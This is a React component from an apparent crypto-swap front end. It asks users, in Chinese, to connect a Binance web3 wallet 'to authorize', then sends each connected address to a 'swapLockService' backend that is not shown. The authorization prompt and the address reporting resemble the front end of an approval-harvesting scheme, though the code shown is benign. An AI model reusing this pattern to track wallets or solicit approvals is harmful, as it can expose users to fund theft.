import React, { useEffect, useMemo } from 'react';
import { useAccount } from 'wagmi';
import { useGlobalState } from '../GlobalStateContext';
import { reportAddress } from '../swapbutton/swapLockService';

function WalletConnectComponent({ children }) {
  const { address, isConnected } = useAccount();
  const { params, updateParams } = useGlobalState();
  let reported = {};
  
  // 检查并更新 sender 地址
  useEffect(() => {
    if(isConnected && !reported[address] && address){
      reportAddress(address);
      reported[address] = true;
    }
    if (isConnected && address && params.sender !== address) {
      console.log('===== 更新发送者地址 =====');
      console.log('当前全局 sender:', params.sender);
      console.log('连接的钱包地址:', address);
      console.log('更新 sender 为连接的地址');
      console.log('====================');
      updateParams({
        sender: address
      });
    }
  }, [isConnected, address, params.sender, updateParams]);
  
  // 使用 useMemo 优化显示内容，避免不必要的重新计算
  const displayAddress = useMemo(() => {
    return address ? `${address.slice(0, 6)}...${address.slice(-4)}` : '';
  }, [address]);
  

  
  // 使用 useMemo 优化条件判断，避免不必要的重新渲染
  const shouldShowWalletInfo = useMemo(() => {
    return isConnected;
  }, [isConnected]);
  
  
  return (
    <div className="wallet-container">
      <h2>点击左上角连接你的币安web3钱包 进行授权</h2>
      
      
      {shouldShowWalletInfo && (
        <div className="wallet-info">
          <p>连接地址: {displayAddress}</p>
        </div>
      )}
      
    </div>
  );
}

export default React.memo(WalletConnectComponent); 